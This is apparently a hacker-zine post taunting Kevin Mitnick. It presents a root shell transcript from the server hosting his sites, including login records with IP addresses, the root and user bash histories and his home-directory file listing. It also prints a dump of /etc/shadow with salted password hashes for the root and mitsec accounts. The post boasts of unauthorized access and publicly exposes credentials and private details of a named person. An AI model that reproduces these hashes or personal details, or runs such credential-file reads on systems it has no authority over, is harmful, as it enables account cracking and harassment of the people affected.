Kevin Mitnick

   Kevin Mitnick - Freedom Owntime       .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    I got a list of demands                                         |
      written on the palm of my hands


Kevin Mitnick, hero to many, wet dream to Emmanuel Goldstein. Consider this a
follow up to the cDc article. Kevin has become the media rep for the hacker
community, something which he has grown further and further apart from ever
since his release. Without John Markoff's sensationalist reporting Kevin
Mitnick would not have the notoriety that allows him to earn his money
providing keynotes at conferences all over the world. Kevin is polluting the
media with bullshit. Whilst we understand that owning him is something which
has been done many, many times, we felt that not presenting his insecurity
publicly would be wrong. Since 2003 this has been done three times of note
and Kevin has used his enormously powerful SOCIAL ENGINEERING techniques to
escape with an unharmed repuation each time. The fact is that he cannot secure
his systems because he does not know how.

Oh before I forget, we were behind the Mitnick mantraining. It was a beautifully
executed social engineering experiment that worked flawlessly and also provided
us with superb quotes. What can I say, The Art of Deception was some of the
most enthralling 352 pages I have ever read.

I now present you some of his excellent excuses:

"The Web hosting provider that hosts my sites was hacked," Mitnick told CNET
News.com in an interview Monday. "Fortunately, I don't keep any confidential
data on my Web site, so it wasn't that serious. Of course, it is embarrassing
to be defaced--nobody likes it."

Defacing Web sites is akin to graffiti in the brick-and-mortar world. "It is
kind of stupid; they do it for the attention," Mitnick said. "When I was a
hacker, I never stooped to defacing sites because that was more like vandalism;
that wasn't any fun. It is more about getting in and being stealth and looking
around and exploring."

Let me set something straight Kevin, www.kevinmitnick.com is your
responsibility to secure. You run a security auditing company - what went
wrong?

One thing I notice about the above, Kevin referring to himself as a hacker in
past tense - heh, at least he doesn't fall for the common fallacy that 'hackers'
are not anything other than people who break into systems.

"They keep getting compromised," he said. "Maybe I'll move it over to Amazon or
something and let them attack Amazon."

That'd be great Kev, hopefully you'll shift our doors straight over there.

root@www.kevinmitnick.com's password:
Last login: Mon Jul 13 17:08:58 2009 from 58.jerveyave.com


---------------------------------------------------------------------------
This computer system is for authorized users only. All activity is logged and
regularly checked by systems personnel. Individuals using this system without
authority or in excess of their authority are subject to having all their
services revoked. Any illegal services run by user or attempts to take down
this server or it's services will be reported to local law enforcement, and
said user will be punished to the full extent of the law. Anyone using this
system consents to these terms.

---------------------------------------------------------------------------
root@dc21 [~]# w
 11:10:22 up 3 days, 12:54,  0 users,  load average: 0.00, 0.00, 0.00
USER  TTY   FROM      LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# uname -a;id
Linux dc21.hostedhere.net 2.6.18-92.1.18.el5.028stab060.2 #1 SMP Tue Jan 13
11:38:36 MSK 2009 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@dc21 [~]# last
reboot  system boot  2.6.18-92.1.18.e Mon Jul 13 22:15  (3+12:37)  
root  pts/0       58.jerveyave.com Mon Jul 13 17:08 - crash  (05:07)   
root  pts/0       greenville.isopo Mon Jul 13 05:55 - 13:35  (07:39)   
reboot  system boot  2.6.18-92.1.18.e Mon Jul 13 00:15  (4+10:38)  
reboot  system boot  2.6.18-92.1.18.e Sun Jul 12 23:58   (00:09)   
root  pts/0       greenville.isopo Fri Jul 10 04:50 - 11:59  (07:09)   
mitsec  pts/0       72.19.162.209    Thu Jul 9 09:41 - 10:01  (00:20)   
root  pts/0       58.jerveyave.com Wed Jul 8 21:27 - 21:27  (00:00)   
root  pts/0       58.jerveyave.com Tue Jul 7 20:00 - 08:12  (12:11)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 19:46  (5+03:53)  
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 17:07   (00:13)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 10:59   (05:36)   
root  pts/0       greenville.isopo Tue Jul 7 05:33 - down  (05:17)   
root  pts/0       5ace2de4.bb.sky. Tue Jul 7 05:31 - 05:32  (00:01)   
reboot  system boot  2.6.18-92.1.18.e Tue Jul 7 02:53   (07:57)   
mitsec  pts/0       ip68-229-7-88.lv Thu Jul 2 00:17 - 02:30  (02:13)   
mitsec  pts/0       ip68-229-7-88.lv Wed Jul 1 00:41 - 01:31  (00:50)   
root  pts/3       tech1.xyzdns.net Tue Jun 30 09:33 - 10:01  (00:27)   
root  pts/2       tech1.xyzdns.net Tue Jun 30 09:32 - 10:01  (00:28)   
root  pts/1       tech1.xyzdns.net Tue Jun 30 09:30 - 10:01  (00:30)   
root  pts/0       58.jerveyave.com Mon Jun 29 15:16 - 16:36 (1+01:19)  
mitsec  pts/1       93.sub-75-212-18 Mon Jun 29 12:40 - 14:57  (02:16)   
root  pts/0       58.jerveyave.com Mon Jun 29 05:30 - 15:14  (09:43)   
mitsec  pts/0       110.sub-75-212-1 Mon Jun 29 04:35 - 04:37  (00:02)   
mitsec  pts/1       nmd.sbx03424.las Mon Jun 29 01:47 - 02:14  (00:26)   
mitsec  pts/1       nmd.sbx03424.las Mon Jun 29 01:19 - 01:25  (00:06)   
mitsec  pts/0       c-67-169-204-62. Mon Jun 29 01:19 - 02:46  (01:27)   
mitsec  pts/1       c-67-169-204-62. Mon Jun 29 01:14 - 01:18  (00:04)   
mitsec  pts/0       nmd.sbx03424.las Mon Jun 29 01:08 - 01:15  (00:06)   
mitsec  pts/0       nmd.sbx03424.las Mon Jun 29 00:11 - 00:32  (00:20)   
root  pts/1       tech1.xyzdns.net Tue Jun 23 05:31 - 06:50  (01:18)   
root  pts/1       tech1.xyzdns.net Tue Jun 23 05:28 - 05:30  (00:01)   
root  pts/0       tech1.xyzdns.net Mon Jun 22 17:54 - 16:17  (22:23)   
mitsec  pts/1       nmd.sbx03424.las Sat Jun 20 02:57 - 03:37  (00:40)   
mitsec  pts/1       ip68-229-7-88.lv Fri Jun 19 22:02 - 22:05  (00:03)   
mitsec  pts/1       ip68-229-7-88.lv Fri Jun 19 20:44 - 21:28  (00:44)   
root  pts/0       58.jerveyave.com Thu Jun 18 20:26 - 09:37 (1+13:11)  
mitsec  pts/0       ip68-229-7-88.lv Thu Jun 18 11:09 - 11:40  (00:31)   
mitsec  pts/0       ip68-229-7-88.lv Wed Jun 17 09:53 - 09:53  (00:00)   
mitsec  pts/0       pool-71-106-244- Mon Jun 15 03:08 - 03:10  (00:02)   
mitsec  pts/0       pool-71-106-244- Tue Jun 9 15:44 - 16:10  (00:25)   
root  pts/0       greenville.isopo Tue Jun 9 12:14 - 14:02  (01:47)   
reboot  system boot  2.6.18-92.1.18.e Mon May 18 15:12  (49+05:01) 
mitsec  pts/0       ip72-193-114-177 Fri May 15 01:44 - 01:59  (00:14)   
root  pts/0       greenville.isopo Fri Apr 24 06:58 - 11:09  (04:11)   
reboot  system boot  2.6.18-92.1.18.e Thu Apr 23 20:26  (73+23:47) 
mitsec  pts/1       186.81.109.196   Mon Apr 20 11:00 - 15:50  (04:50)   
root  pts/1       tech1.xyzdns.net Sun Apr 19 11:39 - 14:16  (02:36)   
root  pts/0       58.jerveyave.com Sun Apr 19 09:01 - 18:36 (4+09:34)  
reboot  system boot  2.6.18-92.1.18.e Sun Apr 19 06:55  (4+11:41)  
reboot  system boot  2.6.18-92.1.18.e Sun Apr 19 06:46   (00:04)   
root  pts/1       tech1.xyzdns.net Sat Apr 18 14:07 - 14:35  (00:28)   
root  pts/0       tech1.xyzdns.net Sat Apr 18 08:18 - 01:28  (17:10)   
reboot  system boot  2.6.18-92.1.18.e Sat Apr 18 07:15   (23:30)   
reboot  system boot  2.6.18-92.1.18.e Fri Apr 17 03:51  (1+03:24)  
root  pts/1       58.jerveyave.com Fri Mar 27 18:21 - 21:42 (5+03:20)  
mitsec  pts/2       wsip-70-168-126- Wed Mar 25 21:34 - 23:46  (02:12)   
root  pts/1       58.jerveyave.com Wed Mar 25 20:03 - 03:45 (1+07:41)  
root  pts/4       tech1.xyzdns.net Tue Mar 24 11:09 - 13:21  (02:12)   
root  pts/3       greenville.isopo Tue Mar 24 11:05 - 14:32  (03:27)   
root  pts/2       tech1.xyzdns.net Mon Mar 23 01:22 - 13:59 (1+12:37)  
root  pts/2       tech1.xyzdns.net Sat Mar 21 15:49 - 17:09  (01:19)   
root  pts/1       66-191-205-150.d Sat Mar 21 15:26 - 20:03 (4+04:36)  
root  pts/0       tech3.xyzdns.net Sat Mar 21 14:08 - 16:40  (02:32)   
root  pts/0       66-191-205-150.d Sat Mar 21 08:54 - 13:08  (04:13)   
reboot  system boot  2.6.18-92.1.18.e Sat Mar 21 08:43  (26+19:06) 
reboot  system boot  2.6.9-023stab040 Sat May 26 10:33   (00:22)   

wtmp begins Sat May 26 10:33:49 2007
root@dc21 [~]# cd /root
root@dc21 [~]# ls -la
total 92
drwxr-xr-x 12 root root 4096 Jul 17 10:51 .
drwxr-xr-x 22 root root 4096 Jul 13 22:16 ..
drwxr-xr-x  7 root root 4096 Mar 21 10:30 .MirrorSearch
-rwxr-xr-x  1 root root 4659 Jul 13 13:35 .bash_history
-rwxr-xr-x  1 root root   24 Jan  6  2007 .bash_logout
-rwxr-xr-x  1 root root  191 Jan  6  2007 .bash_profile
-rwxr-xr-x  1 root root  413 Mar 21 14:09 .bashrc
drwxr-xr-x  4 root root 4096 Mar 21 10:37 .cpanel
drwxr-xr-x  4 root root 4096 Mar 21 09:26 .cpobjcache
-rwxr-xr-x  1 root root  100 Jan  6  2007 .cshrc
drwxr-xr-x  2 root root 4096 Mar 21 09:28 .gnupg
-rw-------  1 root root   46 Jul  6 19:27 .my.cnf
-rwxr-xr-x  1 root root  264 Jul 15 00:27 .pearrc
-rwxr-xr-x  1 root root 1024 Mar 21 10:37 .rnd
drwxr-xr-x  3 root root 4096 Mar 21 10:36 .spamassassin
-rwxr-xr-x  1 root root  129 Jan  6  2007 .tcshrc
drwxr-xr-x  4 root root 4096 Mar 21 14:21 cpanel3-skel
drwxr-xr-x  2 root root 4096 Mar 21 10:22 public_ftp
drwxr-xr-x  3 root root 4096 Mar 21 10:22 public_html
-rwxr-xr-x  1 root root 2171 Dec 12  2008 pure-ftpd
drwxr-xr-x  2 root root 4096 Mar 21 14:09 security
drwxr-xr-x  3 root root 4096 Mar 21 15:51 tmp
root@dc21 [~]# cat .bash_history
passwd
w
w.
w
cd /home
wget
http://layer1.cpanel.net/latest
 sh latest
/scripts/upcp
w
cd /
ls
mv hypervm-scheduled-2.0-vps9.vm-2009-Mar-21-1237645742.tgz
3-21-mitsec-os-image.tgz
ls -l
ls
cd home
ls
wget
http://dc21.hostedhere.net/mitsec.tar.gzw
w
ls
cd /home/
ls
/scripts/restorepkg mitsec.tar.gz
mkdir /root/security;cd /root/security
wget
http://72.3.144.149/software/psm.tar;tar -xvf psm.tar;rm -f psm.tar;./psm
1;rm -f psm.txt;rm -f psm
ls -l
chkrootkit
/usr/local/bin/rkhunter --update
rkhunter -sk -c
/sbin/service apf restart
/sbin/ifconfig
vi /etc/apf/conf.apf
/sbin/service apf restart
cd /root
/scripts/fixdc
/scripts/fixndc
vi /etc/cpupdate.conf
vi /etc/hosts
cd /scripts/
./restartsrv named
./restartsrv http
./upcp --force
./fixcommonproblems
./reinstallmailman
cd /root
hostname -i
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.357
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
vi /etc/apf/conf.apf
/sbin/service sshd restart
/etc/apf/apf -r
cd /root
vi /usr/local/lib/php.ini
vi /usr/local/php4/lib/php.ini
/scripts/restartsrv httpd
vi /etc/apf/conf.apf
apf -r
/sbin/service pure-ftpd stop
mv /etc/rc.d/init.d/pure-ftpd /root/
echo > /etc/rc.d/init.d/pure-ftpd
chattr +i /etc/rc.d/init.d/pure-ftpd
vi /etc/pam.d/crond
service crond restart
passwd mitsec
cd /var/log/
ls
tail secure
w
w
pico /etc/httpd/conf/httpd.conf
whereis php.ini
pico /usr/lib/php.ini
service httpd restart
pico /etc/httpd/conf/httpd.conf
pico /usr/local/apache/conf/php.conf
cd /etc/httpd/conf/
ls
pico php.conf
php -i | grep php.ini
pico /usr/local/lib/php.ini
/scripts/installgd
tail -f /etc/httpd/logs/error_log
service httpd restart
tail -f /etc/httpd/logs/error_log
/scripts/easyapache
cd /home/mitsec/
cd www
pico info.txt
chown mitsec:mitsec info.txt
psaswd mitsec
psaswd mitsec
passwd mitsec
whereis proftpd
la
ls
ls -l
pico index.php
cd /var/log
cat secure
ls
pico rootlogins
ls
pico apf_log
service apf stop
service apf start
pico apf_log
date
pico /etc/apf/conf.apf
service apf restart
pico apf_log
ls
tail secure
w
tail secure
lastlog
cd /home/mitsec/
ls
cd www
ls
cd ..
ls
pico .bash_history
ls
cd /
ls
w
betstat
netstat
w
ls -l
df -h
w
netstat
netstat
netstat
cd /etc/httpd/logs/
ls
tail -f access_log
tail -f error_log
pico /var/log/secure
grep "510" /etc/shadow
grep "510" /etc/passwd
pico /var/log/secure
w
w
cd /var/log/
grep "65.124.165" *
cd /etc/httpd
ls
cd domlogs/
ls
grep "65.124.165" mitnicksecurity.com
pico mitnicksecurity.com
cd mitsec
ls
pico mitnicksecurity.com
cd /home/mitsec/access-logs/
ls
pico mitnicksecurity.com
w
top
vi /usr/local/apache/conf/httpd.conf
vi /usr/local/apache/conf/httpd.conf
cd /usr/local/apache
du -sh
prm
/scripts/restartsrv httpd
top
top
w
history
pico /etc/apf/conf.apf
service apf restart
ping 4.2.2.1
telnet vpn.isopoly.com 25
w
telnet vpn.isopoly.com 25
w
top
w
lastlog
history
exit
w
lastlog
rkhunter -c
w
chkrootkit
ps -aux
cd /var/tmp/
ls -l
cd /tmp
ls -l
rm -Rf r*
cd /usr/local/apache;
ls -l pr
w
top
rkhunter -c
w
vi /usr/local/sim/conf.sim
vi /usr/local/sim/conf.sim
cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325
vi /etc/ssh/sshd_config
vi /etc/apf/conf.apf
/sbin/service sshd restart
/sbin/service apf restart
w
ifconfig
cd /var/log/
tail secure
pico secure
w
w
tail secure
tail secure
tail secure
tail secure
tail secure
cd /etc/ssh
dir
vi sshd_config
w
cd /home/
ls
cd no
ls
cd ..
ls
cd /var/log/
tail secure
tail -n 100 secure
cd /tmp
ls
cd /var/log/btmp
pico /var/log/btmp
cd /var/log
ls -l btmp
pico /etc/passwd
rkhunter
rkhunter -c
 tail /var/cpanel/accounting.log
 tail /var/cpanel/root.accts
df -h
top
history
cd /home/mitsec/
ls -l
cat .lastlogin
ls
cd www
ls
ls -l |grep "Jul"
ls -l
cd ..
ls
cd ..
ls
ls -l
df -h
cd /home/
ls
ls -l
cd mitsec/
ls
ls -l
cd /home/
ls
cd /
ls
ls -l
df -h
rm -Rf 3-21-mitsec-os-image.tgz
df -h
cd /etc
ls
ls -l
top
w
tail /var/log/secure
tail /var/log/messages
netstat
exit
w
df -h
cd /home/
ls
cd no
ls
ls -l
cd ..
ls
cd mitsec/
ls
ls -l
cd public_
cd public_html/
ls
ls -l
ls -l contact_form.php
pico contact_form.php
df -h
top
w
ls -l
cd /
ls
cd ..
ls -l
cd /
ls
ls -l
w
df -h
top
w
cd /
ls
cd tmp
ls
cd backupfileehwcb2/
ls
ls -l
cd ..
ls
cd /
ls
ls -l
rm tmp.tar
ls -l
df -h
cd /home
ls
cd cpbackuptmp/
ls
cd cpbackup/  <-- I *wonder* what's in his CP dir
ls
ls -l
cd daily/
ls
cd ..
cd weekly/
ls
ls -l
cd ..
ls
cd monthly/
ls
cd ..
cd weekly/
ls -l
cd ..
ls
cd ..
ls
cd ..
ls
cd no
ls
cd sources/
ls
cd modules/
ls
ls -l
cd ..
ls
cd authors/
ls
ls -l
cd ..
ls
ls -l
pico MIRRORED.BY
cd ..
ls
ls -l
cd ..
ls
cd virtfs/
ls
ls -l
cd mitsec/
ls
ls -l
cd home
ls
ls -l
cd mitsec/
ls
cd ..
cd ..
cd ..
ls
cd ..
ls
cd /
ls
w
top
root@dc21 [~]# w
 10:53:46 up 3 days, 12:38,  0 users,  load average: 0.00, 0.00, 0.00
USER  TTY   FROM      LOGIN@   IDLE   JCPU   PCPU WHAT
root@dc21 [~]# cat /etc/shadow /etc/passwd
root:$1$5K/cgjHy$YY0B5o9EuLytWnXPBP7eU0:14430:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
cpanel:*:14324::::::
postfix:!!:14324::::::
xfs:!!:14324::::::
mysql:!!:14324::::::
mailman:*:14324::::::
cpanelhorde:*:14324::::::
cpanelphpmyadmin:*:14324::::::
cpanelphppgadmin:*:14324::::::
cpanelroundcube:*:14324::::::
mitsec:$1$VVB/aSDv$cFi4QkgSPku7Gsc0nR.gz/:14327:0:99999:7:::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/
bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc
al/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc
al/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local
/cpanel/bin/noshell
mitsec:x:510:510::/home/mitsec:/usr/local/cpanel/bin/jailshell
root@dc21 [~]# cd /home/mitsec/
root@dc21 [~]# ls -la
total 10085472
drwxr-xr-x 22 mitsec mitsec   4096 Jul 16 10:36 .
drwxr-xr-x 12 root   root   4096 Jul 16 10:36 ..
-rwxr-xr-x  1 mitsec mitsec     64 Mar 20  2007 .Xauthority
-rwxr-xr-x  1 mitsec mitsec   2399 Jul  9 10:01 .bash_history
-rwxr-xr-x  1 mitsec mitsec     24 Feb 25  2006 .bash_logout
-rwxr-xr-x  1 mitsec mitsec    191 Feb 25  2006 .bash_profile
-rwxr-xr-x  1 mitsec mitsec    124 Feb 25  2006 .bashrc
-rwxr-xr-x  1 mitsec mitsec   5619 Aug 21  2006 .canna
-rwxr-xr-x  1 mitsec mitsec     17 Jan 30  2006 .contactemail
-rwxr-xr-x  1 mitsec mitsec     10 Jan 30  2006 .contactsavetime
drwxr-xr-x  5 mitsec mitsec   4096 Mar 21 12:58 .cpanel
-rwxr-xr-x  1 mitsec mitsec   1682 Jan 23  2005 .cpanel-ducache
-rwxr-xr-x  1 mitsec mitsec     19 Jul 17 10:46 .dns
-rwxr-xr-x  1 mitsec mitsec    383 Aug 21  2006 .emacs
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 .fantasticodata
-rwxr-xr-x  1 mitsec mitsec     16 Jul  2 23:11 .ftpquota
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .gnupg
drwxr-xr-x 52 mitsec nobody   4096 Sep  1  2008 .htpasswds
-rwxr-xr-x  1 mitsec mitsec      7 Sep  2  2008 .lang
-rw-------  1 mitsec mitsec     14 Jul 16 10:22 .lastlogin
-rwxr-xr-x  1 mitsec mitsec     35 Jan 13  2009 .lesshst
-rwxr-xr-x  1 mitsec mitsec    6441532 May  6  2006
.pureftpd-upload.445d6ea6.15.1358.7997c79e
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .sqmaildata
drwxr-xr-x  2 mitsec mitsec   4096 Sep  1  2008 .ssh
drwxr-xr-x  2 mitsec mitsec   4096 Mar 28  2007 .trash
-rwxr-xr-x  1 mitsec mitsec    705 Feb 28  2008 .viminfo
-rwxr-xr-x  1 mitsec mitsec      5 Mar  5  2006 .whmtheme
-rwxr-xr-x  1 mitsec mitsec    658 Aug 21  2006 .zshrc
-rwxr-xr-x  1 mitsec mitsec    1361309 Mar  7  2008 CDMA WORKSHOP.rar
-rwxr-xr-x  1 mitsec mitsec   73025457 Mar 20  2007 MitnickDemo.wmv
-rwxr-xr-x  1 mitsec mitsec   20152320 Mar  7  2008 SOFTWARE PACK.rar
-rwxr-xr-x  1 mitsec mitsec  49569 Mar  7  2008 UNIBOX.rar
lrwxrwxrwx  1 mitsec mitsec     32 Jul  7 19:34 access-logs ->
/usr/local/apache/domlogs/mitsec
-rwxr-xr-x  1 mitsec mitsec  582461440 Aug  7  2007 archive.tar
-rwxr-xr-x  1 mitsec mitsec 607360 Sep  4  2007 arcot.ppt
-rwxr-xr-x  1 mitsec mitsec   30242339 Jul 25  2007
asterisk-1.0.8-backup-2007-07-25.tar.gz
-rwxr-xr-x  1 mitsec mitsec 2189910925 Oct 25  2007
backup-10.25.2007_23-54-41_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264566004 Jul 16 10:35
backup-7.16.2009_10-22-58_mitsec.tar.gz
-rw-------  1 mitsec mitsec 3264029970 Jul  8 16:51
backup-7.8.2009_16-39-47_mitsec.tar.gz
-rwxr-xr-x  1 mitsec mitsec  617186883 Aug 19  2007 backup-8.19.2007.tar.gz
-rwxr-xr-x  1 mitsec mitsec  90279 Nov  6  2006 badboys.mp3
-rwxr-xr-x  1 mitsec mitsec    211 May  5  2007 boot.ini
-rwxr-xr-x  1 mitsec mitsec    5305344 Feb  7  2007 circosec-FINAL.ppt
-rwxr-xr-x  1 mitsec mitsec    5299200 Jan  8  2007 circosec.ppt
-rwxr-xr-x  1 mitsec mitsec  99001 Nov 21  2007 clid.tar.gz
-rwxr-xr-x  1 mitsec mitsec  50838 Jun 20 03:10 contact_form.php
drwxr-xr-x  4 mitsec mitsec   4096 Sep  1  2008 cpanel3-skel
-rwxr-xr-x  1 mitsec mitsec      1 Jan 20 22:01 cpbackup-exclude.conf
drwxr-xr-x  2 mitsec mitsec   4096 Mar 18 00:19 cpmove.psql
drwxr-xr-x  3 mitsec mitsec   4096 Sep  1  2008 cpmove.psql.1220367507
drwxr-xr-x  3 mitsec mitsec   4096 Sep  2  2008 cpmove.psql.1237665475
-rwxr-xr-x  1 mitsec mitsec 238515 Aug 19  2007 error_log
-rwxr-xr-x  1 mitsec mitsec   72854668 Aug  3  2008 error_log.txt
drwxr-x--- 14 mitsec mail   4096 Oct 23  2008 etc
-rwxr-xr-x  1 mitsec mitsec  33449 Nov 24  2007 etcasterisk.tar.gz
-rwxr-xr-x  1 mitsec mitsec   74625550 Oct 20  2007 files.zip
-rwxr-xr-x  1 mitsec mitsec   17912486 Apr 18  2007 for-faa.zip
-rwxr-xr-x  1 mitsec mitsec  35938 Apr  6  2007 httpd.conf
-rwxr-xr-x  1 mitsec mitsec  35186 Apr  6  2007 httpd.conf.rpmnew
-rwxr-xr-x  1 mitsec mitsec    1515582 Nov 12  2006 issa.jpg
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk1.ppt
-rwxr-xr-x  1 mitsec mitsec      0 Aug 29  2006 landesk2.ppt
drwxr-xr-x  2 mitsec mitsec   4096 Aug 13  2007 logs
drwxrwx--- 10 mitsec mitsec   4096 Mar 21 14:35 mail
-rwxr-xr-x  1 mitsec mitsec   38559604 Apr 25  2005 mitnickpromo2.mov
-rwxr-xr-x  1 mitsec mitsec   18084536 Apr 18  2007 mitnickpromo2.wmv
-rwxr-xr-x  1 mitsec mitsec 600292 Aug  7  2007
mitsec_mitsecmscontact.csv.zip
-rwxr-xr-x  1 mitsec mitsec 616494 Aug  7  2007
mitsec_mitsecmscontact.sql.zip
-rwxr-xr-x  1 mitsec mitsec 693914 Aug  7  2007
mitsec_mitsecmscontact.xls.zip
-rwxr-xr-x  1 mitsec mitsec   1506 Apr  4  2007 mod_security.conf
drwxr-xr-x  5 mitsec mitsec   4096 Sep  1  2008 moved
-rwxr-xr-x  1 mitsec mitsec   9457 Nov 18  2006 presentations.php
drwxr-xr-x  3 mitsec mitsec   4096 Mar 21 14:34 public_ftp
drwxr-xr-x 24 mitsec nobody   4096 Jul  9 10:01 public_html
-rwxr-xr-x  1 mitsec mitsec  11274 Apr  4  2007 ssl.conf
drwxr-xr-x  2 mitsec mitsec   4096 Jan 30  2008 stuff
drwxr-xr-x  7 mitsec mitsec   4096 Oct 10  2008 tmp
-rwxr-xr-x  1 mitsec mitsec   30189757 Nov 24  2007 varlib.tar.gz
-rwxr-xr-x  1 mitsec mitsec  66023 Jun 19 21:23 websitephp.tar.gz
lrwxrwxrwx  1 mitsec mitsec     11 Jul  7 19:18 www -> public_html
drwxr-xr-x  2 mitsec mitsec   4096 Nov 12  2006 zzhp
-rwxr-xr-x  1 mitsec mitsec  61314 Jun 19 22:03 zzhp.tar.gz
root@dc21 [~]# cat .bash_history
exit
ps aux
ps aux
users
who
cd ../
ls
cd ../
ls
cd bin
ls
cd ../
ls
ls
cd home
ls
cd ../
cd etc
ls
last
vi host.conf
ls
vi shadow
vi passwd
cd /usr
cd local
cd pcanel
cd cpanel
ls
cd bin
ls
./rkhunter
cd ../
ls
cd ../../
cd ../
ls
cd home
ls
cd mitsec/
ls
vi error_log
cat error_log
ls -la
vi .bash_history
vi .bash_history
vi httpd.conf
vi .contactemail
vi .dns
cd logs
ls
cd ../
ls
vi mod_security.conf
cd access-logs
last
cd /var/log
ls
vi messages
vi wtmp
cd ../
cd ../
last -a
last -a
psaux
psaux
p[s aux; exit; q
ps aux
ps aux
cd /scripts
ls
./checkvirtfs
vi checkvirtfs
cd opt
ls
cd ../
cd var
ls
cd ../
ls
last
last -a
netstat -an
netstat
netstat -an
tcp    0   6224 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145
ESTABLISHED
netstat -an | grep -i estab
mitsec@mitnicksecurity.com [/]# netstat -an | grep -i estab
Active Internet connections (servers and established)
tcp    0 177 69.65.59.78:25  88.102.181.144:2320   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55412   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55413   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55153   
ESTABLISHED
tcp    0   0 69.65.59.78:80  124.125.89.117:55416   
ESTABLISHED
tcp    0   0 69.65.59.78:58434  65.254.36.154:21   
ESTABLISHED
tcp    0  51840 69.65.59.78:38345  65.254.36.154:49565   
ESTABLISHED
tcp    0  52 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145
ESTABLISHED
Active UNIX domain sockets (servers and established)
mitsec@mitnicksecurity.com [/]#
netstat -an | grep 67.169.204.62
netstat -an
98.99.158.166tcp 0      0 ::ffff:69.65.59.78:3442   
::ffff:98.99.158.166:64118  ESTABLISHED
netstat -an
users
who
netstat -an
netstat -an | grep .248
netstat -an
netstat -an | gep 67.214.58.248
netstat -an | grep 67.214.58.248
netstat
netstat | grep 67.214.58.248
netstat -an
last
last -a
netstat | grep 216.245.214.108
last
exit
cd public_html/
ls -tal | more
exit
ls
cd mail
ls -lta
ls new
cd new
cat *
cd ..
ls
ls -lta
ls -l cur
ls -l mitnicksecurity.com/
ls -latR | more
ls
cd mitnicksecurity.com/
cd kmitnick/
ls
ls cur
cd new
ls
more *
cd ..
cd ..
cd ..
ls
w
last mitsec
exit
ls
cd www/
ls
ls c*
cd
ls
cd public_
cd public_html/
ls
vi contact_form.php
exitroot@dc21 [~]# ls -al
total 10085472
